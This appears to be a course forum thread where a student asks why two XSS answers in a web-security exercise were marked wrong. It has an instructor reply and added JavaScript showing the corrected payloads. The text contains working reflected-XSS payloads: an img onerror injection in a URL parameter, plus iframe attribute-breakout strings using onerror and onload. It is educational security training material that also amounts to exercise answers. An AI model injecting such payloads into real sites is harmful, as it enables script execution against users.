0 votes
In Exercise 4, question 1e, I submitted the following answer:

https://websec.cs.uni-paderborn.de/websec/api/xss/challenge?verifier=8&firstname=Example&lastname=User&credit_card=DE%206666%206666%206666%206666&access_code=111&session_id=af324dfg345dg435fds&total=%22%3E%3Cimg%20src=x%20onerror=alert(document.location)%3E

Although this successfully triggered the alert, it was marked wrong.

Additionally, in question 2c, I used:

?ifr=' onerror=alert(document.domain) x='

which also executes as intended, yet was also marked incorrect.

Could you please clarify why these responses were marked wrong despite producing the expected behavior?

(Edit: I reposted part of the question as a separate one to keep the exercise categories correct. -JR)
in ex04

1 Answer

0 votes
For 1e) you were supposed to provide the parameter URL-encoded, not the whole URL. So the answer is in an incorrect format.

2c) does not work because you use the onerror handler instead of onload. onerror is only used if the iframe cannot load the content, which it can, as example.com can be framed.
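As an added illustration of the two points in the answer (this is not code from the exercise or from either poster): the first function shows what "the parameter, URL-encoded" looks like for 1e, i.e. only the value of `total`, and the inverse pulls that value back out of the full challenge URL from the question. The second part assumes, as an illustration only, that the 2c page reflects `?ifr=` inside a single-quoted `src` attribute of an `<iframe>`; it renders both the `onerror` payload from the question and the `onload` variant the answer calls for, so you can see that both land as attributes on the tag and that the only difference is which handler is bound. Which of them fires is then down to whether the frame loads, which is the point the answer makes.

```javascript
// Added example for this thread, not part of the original Q&A.
// The iframe template below is an assumption about the exercise page.

// 1e: the expected answer is the value of the `total` parameter, URL-encoded,
// not the whole challenge URL.
const XSS_PAYLOAD = '"><img src=x onerror=alert(document.location)>';

// Percent-encode a parameter value so it survives being placed in a query string.
function encodeParam(payload) {
  return encodeURIComponent(payload);
}

// Inverse: take the full URL that was submitted and recover the decoded
// `total` value, which is the part the grader actually wanted.
function extractParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// 2c: assumed template, the page reflects ?ifr= inside a single-quoted src.
function renderIframe(ifr) {
  return `<iframe src='${ifr}'></iframe>`;
}

// The payload from the question (onerror) and the handler the answer says
// to use instead (onload). Both break out of the src attribute; onload fires
// when example.com loads in the frame, onerror only if the load fails.
const IFR_ONERROR = "' onerror=alert(document.domain) x='";
const IFR_ONLOAD = "' onload=alert(document.domain) x='";

// Return the event-handler attribute names present on the rendered tag,
// so a reader can confirm which handler each payload actually binds.
function handlersIn(html) {
  return [...html.matchAll(/\s(on\w+)=/g)].map((m) => m[1]);
}
```

Running `encodeParam(XSS_PAYLOAD)` gives the string that should have been submitted for 1e; `renderIframe(IFR_ONLOAD)` shows the injected `onload` attribute sitting on the iframe tag.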